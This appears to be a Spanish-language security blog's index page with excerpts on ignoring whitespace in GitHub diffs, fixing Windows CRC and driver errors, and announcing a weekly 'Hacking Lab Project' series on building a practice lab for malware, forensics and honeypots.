Screenshot of disabling whitespace comparison in GitHub for diffs of the Hello, World! Javascript code after adding leading whitespace and deleting trailing whitespace

El resultado es evidente, asi dejamos de ver, aunque a todo esto deberiamos de ser mas cuidadosos al hacer push, y tener alguna forma de quitar los whitespaces, en Sublime se puede hacer mediante un codigo en preferencias, ire investigando como hacerlo en VIM, y demas editores  de consola.

Regards,
Snifer

Leer Mas


Desde el viernes he estado trabajando puramente de Técnico Informático con sus virtudes y defectos.  Bueno, lo que suponía que me llevaría un día de trabajo me ha vuelto loco hasta el día de hoy debido al error CRC ( Error de redundancia cíclica), a un error 0xc0000005 y a los malos driver de una compañía de tarjetas de red que hacia el burro con la wlanapi.dll.  

Al final todos esos errores se han podido solucionar pero, me ha hecho gracia pensar que estaba jugando al hundir la flota (Ya sabéis el BattleShips, el de los barquitos) mientras probaba las diferentes formas de solucionarlos. Ha sido tres días muy productivos, para aprender has de fallar muchísimas veces. Muchas.

Sed Buenos y espero que os guste ^^ 
Leer Mas

Cuando iniciamos en el mundo de la seguridad, en si el mundo del Hacking siempre nos topamos con un problema donde como practicar, lo primero que nos entra es el factor duda si pruebo con la pagina de la universidad o bien buscamos un vector de ataque, en este proceso podemos cometer algun error y meternos donde no nos llaman, claro que antes de lanzarnos lo mejor es practicar es por ello que en SniferL4bs haremos todo lo posible por tener una entrega semanal de Hacking Lab Project iniciando desde el siguiente fin de semana, adicionalmente a ello hare lo posible en realizar pequeños mini tutoriales los cuales ire subiendo a Youtube de la configuración quiero hacer un cambio en el blog, y por sugerencia de un amigo en twitter mejoraremos todo.


Por ello en Hacking Lab Project abordaremos todo lo  relacionado a las siguientes areas:
  • Malware
  • Forense
  • Ingenieria Inversa
  • Distribuciones de Seguridad
  • Honeypots
  • Montando nuestro entorno Vulnerable
  • y mas...
Y alguna mas que vaya apareciendo en el momento, o se nos ocurra :) sabemos que ando un poco Loco, y no me vengan que ya salió la entrada del dia que hoy ando con ganas de escribir y quizas sean 3 veremos que sucede.

Diran porque montar un laboratorio   o mejor dicho un Hacking Lab? 

  • Costos
  • Control del entorno
  • Recursos
  • Practicamos sin caer presos ;).
Y un largo etc que lo veremos mas a detalle o mejor dicho con una explicación desde mi punto de vista.
Estas entradas las ire volcando en el repositorio que crearé en Github para tenerlo en formato libro :) para CraftBooks.

Como siempre les dire toda ayuda, colaboración crítica es bienvenida, y llamadas de atención mejoras al documento bienvenidas!

Regards,
Snifer
Leer Mas